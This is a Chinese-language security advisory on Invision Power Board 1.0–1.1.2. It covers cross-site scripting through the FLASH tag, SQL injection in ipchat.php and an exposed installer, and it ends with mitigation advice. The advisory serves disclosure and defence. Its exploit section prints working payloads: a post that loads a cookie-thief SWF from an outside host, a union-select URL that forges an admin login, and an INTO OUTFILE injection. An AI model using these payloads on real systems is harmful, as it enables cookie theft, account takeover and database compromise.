添加时间:
2005-08-14

系统编号:
WAVDB-00278
BUGTRAQ: 8165

影响版本:
Invision Power Board 1.0-1.1.2

程序介绍:

Invision Power Board是一款强大的广泛流行的WEB公告版系统。

漏洞分析:

Invision Power Board由于对用户输入缺少充分过滤，远程攻击者可以利用这个漏洞进行SQL注入，HTML注入等多种攻击。

具体漏洞如下：

1、跨站脚本执行攻击：

问题存在于post.php中，通过在POST文本域中使用[FLASH=h,w][/FLASH]标记，可导致执行任意脚本，可导致COOKIE被窃取。

2、SQL注入：

ipchat.php存在SQL注入问题，根据mysql版本或文件权限问题可能更改SQL查询结构。

3、管理员问题
如果由于部分原因，如权限和目录移动，installer-lockfile(install.lock)文件丢失的情况下，任意用户就可以使用 sm_install.php 脚本，一旦成为管理员，就可以执行如下操作：

1. 通过 admin.php/act=mysql/code=runsql/query=sq 执行任意SQL查询。
2. 上传任意文件，包括程序和脚本到 emoticons 目录。

漏洞利用:

- 跨站脚本问题：

---*---
hey dude, whats up?
[FLASH=2,2]http://anotherhost.ext/cookie-thief.swf[/FLASH]
cu,
jonnie
---*---

- SQL注入问题：

EXAMPLE(mySql > 4):
---*---
http://localhost/ibo/ipchat.php?password=1&username=9x%2527+union+select+%25271%2527,%2527c4ca4238a0b923820dcc509a6f75849b%2527,%2527admin%2527,1%252f*+
---*---

EXAMPLE(with file-permission set):
---*---
http://localhost/ibo/ipchat.php?password=1&username=admin%2527into+outfile+%2527[fullpath]%2527--+
---*---

解决方案:
临时解决方法：
如果您不能立刻安装补丁或者升级，建议您采取以下措施以降低威胁：
* 在 conf_global.php 中关闭FLASH标记使用可防止跨站脚本问题。

厂商补丁：
Invision PS
-----------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://www.invisionboard.com/

信息来源:
<*来源：Martin Eiszner （security@freefly.com）
链接：http://marc.theaimsgroup.com/?l=bugtraq&m=105795056510504&w=2
*>